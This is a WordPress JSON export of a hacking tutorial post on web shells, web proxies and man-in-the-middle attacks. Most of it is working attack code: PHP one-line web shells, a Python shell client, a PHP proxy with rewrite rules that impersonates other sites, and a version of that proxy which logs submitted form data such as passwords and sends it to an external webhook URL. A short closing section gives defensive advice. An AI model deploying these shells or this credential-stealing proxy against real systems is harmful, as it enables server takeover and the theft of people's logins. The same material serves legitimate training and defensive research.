{"id":2955,"date":"2022-06-18T14:05:23","date_gmt":"2022-06-18T18:05:23","guid":{"rendered":"https:\/\/dft.wiki\/?p=2955"},"modified":"2026-06-08T17:30:51","modified_gmt":"2026-06-08T21:30:51","slug":"web-shell-and-web-proxy","status":"publish","type":"post","link":"https:\/\/dft.wiki\/?p=2955","title":{"rendered":"Web Shell, Web Proxy, and Man-In-The-Middle"},"content":{"rendered":"<p>In this post, both concepts and practical exercises are provided to help consolidate valuable knowledge for attackers and defenders.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-4196\" src=\"https:\/\/dft.wiki\/wp-content\/uploads\/sites\/15\/2022\/06\/chains.jpg\" alt=\"\" width=\"612\" height=\"565\" srcset=\"https:\/\/dft.wiki\/wp-content\/uploads\/sites\/15\/2022\/06\/chains.jpg 612w, https:\/\/dft.wiki\/wp-content\/uploads\/sites\/15\/2022\/06\/chains-300x277.jpg 300w\" sizes=\"auto, (max-width: 612px) 100vw, 612px\" \/><\/p>\n<p>Feel free to build upon the following tools for CTF Competitions or Pentest Campaigns.<\/p>\n<hr \/>\n<p><strong>WEB SHELLS<\/strong><\/p>\n<p>Web Shells are scripts that allow an attacker to execute commands on a remote web server and establish persistence. They are typically deployed by exploiting vulnerabilities in an existing web application. Once installed, an attacker can upload or download files, escalate privileges, and more.<\/p>\n<p>A web shell can exist as a standalone file, as a poisoned file within the existing application, or by exploiting original code that does not properly sanitize variables. The scripting language depends on what is enabled on the web server. For example, servers running popular frameworks such as WordPress, Drupal, or Laravel almost certainly run PHP, while a server fingerprinted as Microsoft IIS will likely run ASP, though it is not limited to that.<\/p>\n<hr \/>\n<p><strong>HANDS-ON EXERCISE<\/strong><\/p>\n<ul>\n<li><strong>Classic<\/strong><\/li>\n<\/ul>\n<pre>&lt;?php echo shell_exec($_GET[\"cmd\"]); ?&gt;<\/pre>\n<ul>\n<li><strong>China Chopper<\/strong><\/li>\n<\/ul>\n<pre>&lt;?php @eval($_POST['cmd']); ?&gt;<\/pre>\n<p><strong>Note:<\/strong> in both examples above, the variable <code>cmd<\/code> is executed with no sanitization.<\/p>\n<hr \/>\n<p><strong>BASIC EXPLOITATION<\/strong><\/p>\n<ul>\n<li>Using the browser, navigate to: <strong>http:\/\/server.address\/?<span style=\"text-decoration: underline;\">cmd=whoami<\/span><\/strong><\/li>\n<li>Using curl, type: <code>curl \"http:\/\/server.address\/?cmd=whoami\"<\/code><\/li>\n<\/ul>\n<p><strong>BASIC CLIENT HANDLER<\/strong><\/p>\n<pre>#!\/usr\/bin\/env python3\r\n\r\nimport sys\r\nimport requests\r\n\r\nif len(sys.argv) &gt; 1:\r\n    url = sys.argv[1]\r\nelse:\r\n    url = input(\"Enter the URL of the PHP webshell: \")\r\n\r\nwhile True:\r\n    cmd = input(\"$ \")\r\n    if cmd == \"exit\":\r\n        break\r\n    response = requests.get(url, params={\"cmd\": cmd})\r\n    print(response.text)<\/pre>\n<pre>chmod +x webshell-client.py\r\n.\/webshell-client.py http:\/\/server.address<strong>\/path\/webshell.php<\/strong><\/pre>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-4176\" src=\"https:\/\/dft.wiki\/wp-content\/uploads\/sites\/15\/2022\/06\/Screenshot-from-2024-04-19-14-56-29.png\" alt=\"\" width=\"712\" height=\"224\" srcset=\"https:\/\/dft.wiki\/wp-content\/uploads\/sites\/15\/2022\/06\/Screenshot-from-2024-04-19-14-56-29.png 712w, https:\/\/dft.wiki\/wp-content\/uploads\/sites\/15\/2022\/06\/Screenshot-from-2024-04-19-14-56-29-300x94.png 300w\" sizes=\"auto, (max-width: 712px) 100vw, 712px\" \/><\/p>\n<p><strong>Note:<\/strong> in the example above, the web shell file is named <code>index.php<\/code> and was placed at the root of the site (path = <code>\/<\/code>).<\/p>\n<hr \/>\n<p><strong>WEB SHELL WITH UI<\/strong><\/p>\n<pre>&lt;html&gt;&lt;body&gt;&lt;form method=\"GET\" name=\"&lt;?php echo basename($_SERVER['PHP_SELF']); ?&gt;\"&gt;\r\n&lt;input type=\"TEXT\" name=\"cmd\" autofocus id=\"cmd\" size=\"80\"&gt;&lt;input type=\"SUBMIT\" value=\"Execute\"&gt;&lt;\/form&gt;\r\n\r\n&lt;pre&gt;&lt;?php if(isset($_GET['cmd'])) { system($_GET['cmd']); }?&gt;&lt;\/pre&gt;&lt;\/body&gt;&lt;\/html&gt;<\/pre>\n<p><strong>USING THE WEB SHELL<\/strong><\/p>\n<ul>\n<li>Navigate to: <strong>http:\/\/server.address\/<\/strong><\/li>\n<li>Enter any command and click Execute.<\/li>\n<\/ul>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-4177\" src=\"https:\/\/dft.wiki\/wp-content\/uploads\/sites\/15\/2022\/06\/Screenshot-from-2024-04-19-15-09-33.png\" alt=\"\" width=\"748\" height=\"137\" srcset=\"https:\/\/dft.wiki\/wp-content\/uploads\/sites\/15\/2022\/06\/Screenshot-from-2024-04-19-15-09-33.png 748w, https:\/\/dft.wiki\/wp-content\/uploads\/sites\/15\/2022\/06\/Screenshot-from-2024-04-19-15-09-33-300x55.png 300w\" sizes=\"auto, (max-width: 748px) 100vw, 748px\" \/><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-4178\" src=\"https:\/\/dft.wiki\/wp-content\/uploads\/sites\/15\/2022\/06\/Screenshot-from-2024-04-19-15-08-46.png\" alt=\"\" width=\"748\" height=\"137\" srcset=\"https:\/\/dft.wiki\/wp-content\/uploads\/sites\/15\/2022\/06\/Screenshot-from-2024-04-19-15-08-46.png 748w, https:\/\/dft.wiki\/wp-content\/uploads\/sites\/15\/2022\/06\/Screenshot-from-2024-04-19-15-08-46-300x55.png 300w\" sizes=\"auto, (max-width: 748px) 100vw, 748px\" \/><\/p>\n<ul>\n<li>Try the command <code>curl ip.me<\/code><\/li>\n<\/ul>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-4180\" src=\"https:\/\/dft.wiki\/wp-content\/uploads\/sites\/15\/2022\/06\/Screenshot-from-2024-04-19-15-15-50.png\" alt=\"\" width=\"748\" height=\"137\" srcset=\"https:\/\/dft.wiki\/wp-content\/uploads\/sites\/15\/2022\/06\/Screenshot-from-2024-04-19-15-15-50.png 748w, https:\/\/dft.wiki\/wp-content\/uploads\/sites\/15\/2022\/06\/Screenshot-from-2024-04-19-15-15-50-300x55.png 300w\" sizes=\"auto, (max-width: 748px) 100vw, 748px\" \/><\/p>\n<p><strong>Note:<\/strong> in the last command, an HTTP request was issued remotely and proxied back to the attacker&#8217;s browser.<\/p>\n<hr \/>\n<p><strong>WEB PROXY<\/strong><\/p>\n<p>A Web Proxy, in the context of hacking, fetches external content from a remote server and forwards it to the attacker. It can be used to hide the attacker&#8217;s IP from the target, or to pivot into a private network segment.<\/p>\n<p>Here is an example of a minimal Web Proxy.<\/p>\n<p>Create the file <code>index.php<\/code> with the following content at the root of the <strong>Default<\/strong> website (more on this later):<\/p>\n<pre>&lt;?php\r\n$url = \"https:\/\/\" . $_SERVER['HTTP_HOST'] . $_GET['url'];\r\n\r\n$headers = get_headers($url, true);\r\nforeach ($headers as $name =&gt; $value) {\r\n  if (is_string($name) &amp;&amp; $name == 'Content-Type') {\r\n    header(\"$name: $value\");\r\n  }\r\n}\r\n\r\necho file_get_contents($url);\r\n?&gt;<\/pre>\n<ul>\n<li>First block:\n<ul>\n<li>The script builds the URL from the received Host header (e.g. <code>example.com<\/code>) and the <code>url<\/code> argument.<\/li>\n<\/ul>\n<\/li>\n<li>Middle block:\n<ul>\n<li>Before fetching the content, it retrieves only the headers and looks for <code>Content-Type<\/code>.<\/li>\n<li>Setting this header before forwarding content is important; otherwise, images, icons, and non-HTML files will fail to load in the browser.<\/li>\n<\/ul>\n<\/li>\n<li>Last block:\n<ul>\n<li>It fetches the content of the remote URL and forwards it to the attacker.<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<p>This attack may not work out of the box. It requires the web server (Apache, NGINX, etc.) to have the Rewrite Module enabled (<code>sudo a2enmod rewrite<\/code>).<\/p>\n<p>Create the file <code>.htaccess<\/code> in the same directory with the following content:<\/p>\n<pre>RewriteEngine On\r\nRewriteRule !(^$) \/?url=%{REQUEST_URI} [R=301,L]<\/pre>\n<ul>\n<li>The first line enables the Rewrite Engine.<\/li>\n<li>The second line redirects all requests with a non-empty URL to the same URL prefixed with <code>\/?url=<\/code>.<\/li>\n<\/ul>\n<p><strong>Connecting the Links of the Chain<\/strong><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-4181\" src=\"https:\/\/dft.wiki\/wp-content\/uploads\/sites\/15\/2022\/06\/chain-1.jpg\" alt=\"\" width=\"612\" height=\"180\" srcset=\"https:\/\/dft.wiki\/wp-content\/uploads\/sites\/15\/2022\/06\/chain-1.jpg 612w, https:\/\/dft.wiki\/wp-content\/uploads\/sites\/15\/2022\/06\/chain-1-300x88.jpg 300w\" sizes=\"auto, (max-width: 612px) 100vw, 612px\" \/><\/p>\n<ol>\n<li>An attacker compromises a web server.<\/li>\n<li>A web shell is uploaded to <code>\/var\/www\/html<\/code>.<\/li>\n<li>The web server has the Rewrite module enabled.<\/li>\n<li>Alongside the PHP default, the default VHost is still present.<\/li>\n<li>By resolving domains to the compromised server, the attacker can pivot freely.<\/li>\n<\/ol>\n<p>The attacker can locally resolve any domain to the compromised server. That server will handle requests using the default VHost, fetch the real page, and proxy it to the attacker&#8217;s browser as if it were the legitimate server.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-4183\" src=\"https:\/\/dft.wiki\/wp-content\/uploads\/sites\/15\/2022\/06\/Screenshot-from-2024-04-19-21-07-16.png\" alt=\"\" width=\"1673\" height=\"849\" srcset=\"https:\/\/dft.wiki\/wp-content\/uploads\/sites\/15\/2022\/06\/Screenshot-from-2024-04-19-21-07-16.png 1673w, https:\/\/dft.wiki\/wp-content\/uploads\/sites\/15\/2022\/06\/Screenshot-from-2024-04-19-21-07-16-300x152.png 300w, https:\/\/dft.wiki\/wp-content\/uploads\/sites\/15\/2022\/06\/Screenshot-from-2024-04-19-21-07-16-1024x520.png 1024w, https:\/\/dft.wiki\/wp-content\/uploads\/sites\/15\/2022\/06\/Screenshot-from-2024-04-19-21-07-16-768x390.png 768w, https:\/\/dft.wiki\/wp-content\/uploads\/sites\/15\/2022\/06\/Screenshot-from-2024-04-19-21-07-16-1536x779.png 1536w\" sizes=\"auto, (max-width: 1673px) 100vw, 1673px\" \/><\/p>\n<p>All other files that make up the page (images, icons, CSS styles, etc.) will be redirected properly, thanks to the Rewrite module and the <code>.htaccess<\/code> configuration.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-4184\" src=\"https:\/\/dft.wiki\/wp-content\/uploads\/sites\/15\/2022\/06\/Screenshot-from-2024-04-19-21-07-18.png\" alt=\"\" width=\"1673\" height=\"849\" srcset=\"https:\/\/dft.wiki\/wp-content\/uploads\/sites\/15\/2022\/06\/Screenshot-from-2024-04-19-21-07-18.png 1673w, https:\/\/dft.wiki\/wp-content\/uploads\/sites\/15\/2022\/06\/Screenshot-from-2024-04-19-21-07-18-300x152.png 300w, https:\/\/dft.wiki\/wp-content\/uploads\/sites\/15\/2022\/06\/Screenshot-from-2024-04-19-21-07-18-1024x520.png 1024w, https:\/\/dft.wiki\/wp-content\/uploads\/sites\/15\/2022\/06\/Screenshot-from-2024-04-19-21-07-18-768x390.png 768w, https:\/\/dft.wiki\/wp-content\/uploads\/sites\/15\/2022\/06\/Screenshot-from-2024-04-19-21-07-18-1536x779.png 1536w\" sizes=\"auto, (max-width: 1673px) 100vw, 1673px\" \/><\/p>\n<p>The Web Proxy will handle subsequent requests the same way, continuing to impersonate the original page even as the user follows links (GET).<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-4186\" src=\"https:\/\/dft.wiki\/wp-content\/uploads\/sites\/15\/2022\/06\/Screenshot-from-2024-04-19-21-07-19-1.png\" alt=\"\" width=\"1673\" height=\"849\" srcset=\"https:\/\/dft.wiki\/wp-content\/uploads\/sites\/15\/2022\/06\/Screenshot-from-2024-04-19-21-07-19-1.png 1673w, https:\/\/dft.wiki\/wp-content\/uploads\/sites\/15\/2022\/06\/Screenshot-from-2024-04-19-21-07-19-1-300x152.png 300w, https:\/\/dft.wiki\/wp-content\/uploads\/sites\/15\/2022\/06\/Screenshot-from-2024-04-19-21-07-19-1-1024x520.png 1024w, https:\/\/dft.wiki\/wp-content\/uploads\/sites\/15\/2022\/06\/Screenshot-from-2024-04-19-21-07-19-1-768x390.png 768w, https:\/\/dft.wiki\/wp-content\/uploads\/sites\/15\/2022\/06\/Screenshot-from-2024-04-19-21-07-19-1-1536x779.png 1536w\" sizes=\"auto, (max-width: 1673px) 100vw, 1673px\" \/><\/p>\n<p>Many other simple HTTP pages can be proxied with little effort.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-4182\" src=\"https:\/\/dft.wiki\/wp-content\/uploads\/sites\/15\/2022\/06\/Screenshot-from-2024-04-19-21-07-39.png\" alt=\"\" width=\"1673\" height=\"849\" srcset=\"https:\/\/dft.wiki\/wp-content\/uploads\/sites\/15\/2022\/06\/Screenshot-from-2024-04-19-21-07-39.png 1673w, https:\/\/dft.wiki\/wp-content\/uploads\/sites\/15\/2022\/06\/Screenshot-from-2024-04-19-21-07-39-300x152.png 300w, https:\/\/dft.wiki\/wp-content\/uploads\/sites\/15\/2022\/06\/Screenshot-from-2024-04-19-21-07-39-1024x520.png 1024w, https:\/\/dft.wiki\/wp-content\/uploads\/sites\/15\/2022\/06\/Screenshot-from-2024-04-19-21-07-39-768x390.png 768w, https:\/\/dft.wiki\/wp-content\/uploads\/sites\/15\/2022\/06\/Screenshot-from-2024-04-19-21-07-39-1536x779.png 1536w\" sizes=\"auto, (max-width: 1673px) 100vw, 1673px\" \/><\/p>\n<p><strong><span style=\"color: red;\">IMPORTANT:<\/span><\/strong> this Web Proxy script is a proof of concept and is susceptible to leaks via redirects, JavaScript, and other means. It does not guarantee privacy or anonymity.<\/p>\n<hr \/>\n<p><strong>MAN-IN-THE-MIDDLE<\/strong><\/p>\n<p>While a web shell is primarily used to establish persistence and take over a server, a web proxy can be used to pivot and attack other servers or users who fall into the trap. See the attack chain:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-4187\" src=\"https:\/\/dft.wiki\/wp-content\/uploads\/sites\/15\/2022\/06\/chain-2.jpg\" alt=\"\" width=\"612\" height=\"178\" srcset=\"https:\/\/dft.wiki\/wp-content\/uploads\/sites\/15\/2022\/06\/chain-2.jpg 612w, https:\/\/dft.wiki\/wp-content\/uploads\/sites\/15\/2022\/06\/chain-2-300x87.jpg 300w\" sizes=\"auto, (max-width: 612px) 100vw, 612px\" \/><\/p>\n<ol>\n<li>The victim uses their browser to visit a site.<\/li>\n<li>There are many ways a malicious or compromised device can intercept the traffic:\n<ol>\n<li>A rogue access point impersonating a trusted network,<\/li>\n<li>An insecure Wi-Fi at a coffee shop, airport, or hotel,<\/li>\n<li>A malicious VPN or ISP,<\/li>\n<li>Malware or a malicious browser extension,<\/li>\n<li>and the list goes on.<\/li>\n<\/ol>\n<\/li>\n<li>A poisoned DNS resolution directs the user to the wrong server.<\/li>\n<li>The web proxy controlled by the attacker logs all forwarded traffic, including passwords.<\/li>\n<li>The targeted site could contain sensitive information, such as a corporate network, email provider, or bank.<\/li>\n<\/ol>\n<p>Let&#8217;s update <code>index.php<\/code> to add logging and exfiltration capabilities:<\/p>\n<pre>&lt;?php\r\n$url = \"https:\/\/\" . $_SERVER['HTTP_HOST'] . $_GET['url'];\r\n\r\n<strong>if ($_SERVER[\"REQUEST_METHOD\"] == \"POST\") {\r\n    $logFile = \"postData.log\";\r\n    $postData = http_build_query($_POST);\r\n    file_put_contents($logFile, $url.' '.urldecode($postData).\"\\n\", FILE_APPEND | LOCK_EX);\r\n    @file_get_contents('https:\/\/webhook.site\/c2ae5980-e09f-4ab5-8acf-879d7b417a28?' . $postData);\r\n}<\/strong>\r\n\r\n$headers = get_headers($url, true);\r\nforeach ($headers as $name =&gt; $value) {\r\n    if (is_string($name) &amp;&amp; $name == 'Content-Type') {\r\n       header(\"$name: $value\");\r\n    }\r\n}\r\n\r\necho file_get_contents($url);\r\n?&gt;<\/pre>\n<ul>\n<li>The highlighted block adds the following:\n<ul>\n<li>It checks whether the request was sent via POST, which typically contains form data such as credentials.<\/li>\n<li>It saves the request content to a file called <code>postData.log<\/code>.<\/li>\n<li>It calls an external endpoint to immediately exfiltrate the same data.<\/li>\n<li>It then loads the page content as before.\n<ul>\n<li>Note that the user will never successfully log in or submit a form to the real site. The attacker&#8217;s goal is to steal information, and that has been accomplished.<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<p>The <code>.htaccess<\/code> file also needs a small update:<\/p>\n<pre>RewriteEngine On\r\n\r\n<strong>RewriteCond %{REQUEST_METHOD} =GET<\/strong>\r\nRewriteRule !(^$) \/?url=%{REQUEST_URI} [R=301,L]\r\n\r\n<strong>RewriteCond %{REQUEST_METHOD} =POST<\/strong>\r\nRewriteRule !(^$) \/?url=%{REQUEST_URI} [R=<strong>307<\/strong>,L]<\/pre>\n<p>It now checks the method of the incoming request so it can redirect using the same method.<\/p>\n<p>Checking stolen information:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-4190\" src=\"https:\/\/dft.wiki\/wp-content\/uploads\/sites\/15\/2022\/06\/Screenshot-from-2024-04-20-11-22-09.png\" alt=\"\" width=\"557\" height=\"175\" srcset=\"https:\/\/dft.wiki\/wp-content\/uploads\/sites\/15\/2022\/06\/Screenshot-from-2024-04-20-11-22-09.png 557w, https:\/\/dft.wiki\/wp-content\/uploads\/sites\/15\/2022\/06\/Screenshot-from-2024-04-20-11-22-09-300x94.png 300w\" sizes=\"auto, (max-width: 557px) 100vw, 557px\" \/><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-4191\" src=\"https:\/\/dft.wiki\/wp-content\/uploads\/sites\/15\/2022\/06\/Screenshot-from-2024-04-20-10-54-13.png\" alt=\"\" width=\"971\" height=\"425\" srcset=\"https:\/\/dft.wiki\/wp-content\/uploads\/sites\/15\/2022\/06\/Screenshot-from-2024-04-20-10-54-13.png 971w, https:\/\/dft.wiki\/wp-content\/uploads\/sites\/15\/2022\/06\/Screenshot-from-2024-04-20-10-54-13-300x131.png 300w, https:\/\/dft.wiki\/wp-content\/uploads\/sites\/15\/2022\/06\/Screenshot-from-2024-04-20-10-54-13-768x336.png 768w\" sizes=\"auto, (max-width: 971px) 100vw, 971px\" \/><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-4192\" src=\"https:\/\/dft.wiki\/wp-content\/uploads\/sites\/15\/2022\/06\/Screenshot-from-2024-04-20-10-55-27.png\" alt=\"\" width=\"971\" height=\"452\" srcset=\"https:\/\/dft.wiki\/wp-content\/uploads\/sites\/15\/2022\/06\/Screenshot-from-2024-04-20-10-55-27.png 971w, https:\/\/dft.wiki\/wp-content\/uploads\/sites\/15\/2022\/06\/Screenshot-from-2024-04-20-10-55-27-300x140.png 300w, https:\/\/dft.wiki\/wp-content\/uploads\/sites\/15\/2022\/06\/Screenshot-from-2024-04-20-10-55-27-768x358.png 768w\" sizes=\"auto, (max-width: 971px) 100vw, 971px\" \/><\/p>\n<p>Success!<\/p>\n<hr \/>\n<p><strong>REFLECTION NOTES<\/strong><\/p>\n<p>I hope this exercise clarified the fundamentals every defender needs to master in order to mitigate or block these attack vectors.<\/p>\n<ul>\n<li><strong>Web Shell<\/strong>\n<ul>\n<li>It is a post-exploitation tool (e.g. for persistence) that requires the server to be compromised first.<\/li>\n<li><span style=\"text-decoration: underline;\">A Web Application Firewall (WAF) can help block many of the exploitation methods that enable it.<\/span><\/li>\n<\/ul>\n<\/li>\n<li><strong>Web Proxy<\/strong>\n<ul>\n<li>Sometimes the only value of a compromised web server is its use as a proxy to attack other targets.<\/li>\n<li><span style=\"text-decoration: underline;\">Monitoring network traffic can reveal this type of behavior.<\/span><\/li>\n<li><span style=\"text-decoration: underline;\">Parsing logs for a high volume of requests from a single or small number of clients can help identify the source.<\/span><\/li>\n<\/ul>\n<\/li>\n<li><strong>Man-In-The-Middle<\/strong>\n<ul>\n<li><span style=\"text-decoration: underline;\">Securing devices and network assets plays a major role in breaking the attack chain.<\/span><\/li>\n<li>The server used to steal information does not need to be a compromised server on the internet. It could easily be a VM or a computer on the victim&#8217;s local or rogue network.<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<hr \/>\n<p><strong>BONUS<\/strong><\/p>\n<ul>\n<li>Web Shell projects:\n<ul>\n<li><strong>WSO-ng<\/strong> [<a href=\"https:\/\/github.com\/aels\/wso-ng\">Link<\/a>].<\/li>\n<\/ul>\n<\/li>\n<li>On Kali, list the available web shells:\n<ul>\n<li><code>tree \/usr\/share\/webshells\/<\/code><\/li>\n<\/ul>\n<\/li>\n<li>Web Proxy projects:\n<ul>\n<li><strong>PHPProxy<\/strong> (discontinued) [<a href=\"https:\/\/sourceforge.net\/projects\/poxy\/\">Link<\/a>].<\/li>\n<li><strong>PHP-Proxy<\/strong> [<a href=\"https:\/\/www.php-proxy.com\/\">Link<\/a>].<\/li>\n<li><strong>Glype<\/strong> [<a href=\"https:\/\/github.com\/jim3ma\/glype\">Link<\/a>].<\/li>\n<li><strong>PHP Web Proxy<\/strong> [<a href=\"https:\/\/github.com\/NicheOffice\/php-web-proxy\">Link<\/a>].<\/li>\n<\/ul>\n<\/li>\n<li>Free open web proxies:\n<ul>\n<li><strong>Free Proxy<\/strong> [<a href=\"http:\/\/free-proxy.cz\/en\/\">Link<\/a>].<\/li>\n<\/ul>\n<\/li>\n<li>PHP Proxy Server:\n<ul>\n<li><strong>Socks5-Proxy<\/strong> [<a href=\"https:\/\/github.com\/walkor\/php-socks5\">Link<\/a>].<\/li>\n<li><strong>ShadowSocks-PHP<\/strong> [<a href=\"https:\/\/github.com\/walkor\/shadowsocks-php\">Link<\/a>].<\/li>\n<li><strong>PHP-HTTP-Proxy<\/strong> [<a href=\"https:\/\/github.com\/walkor\/php-http-proxy\">Link<\/a>].<\/li>\n<li><strong>PHPsocket.io<\/strong> [<a href=\"https:\/\/github.com\/walkor\/phpsocket.io\">Link<\/a>].<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n","protected":false},"excerpt":{"rendered":"<p>In this post, both concepts and practical exercises are provided to help consolidate valuable knowledge [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[9,7],"tags":[],"class_list":["post-2955","post","type-post","status-publish","format-standard","hentry","category-hacking","category-web"],"_links":{"self":[{"href":"https:\/\/dft.wiki\/index.php?rest_route=\/wp\/v2\/posts\/2955","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/dft.wiki\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/dft.wiki\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/dft.wiki\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/dft.wiki\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2955"}],"version-history":[{"count":14,"href":"https:\/\/dft.wiki\/index.php?rest_route=\/wp\/v2\/posts\/2955\/revisions"}],"predecessor-version":[{"id":5669,"href":"https:\/\/dft.wiki\/index.php?rest_route=\/wp\/v2\/posts\/2955\/revisions\/5669"}],"wp:attachment":[{"href":"https:\/\/dft.wiki\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2955"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/dft.wiki\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2955"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/dft.wiki\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2955"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}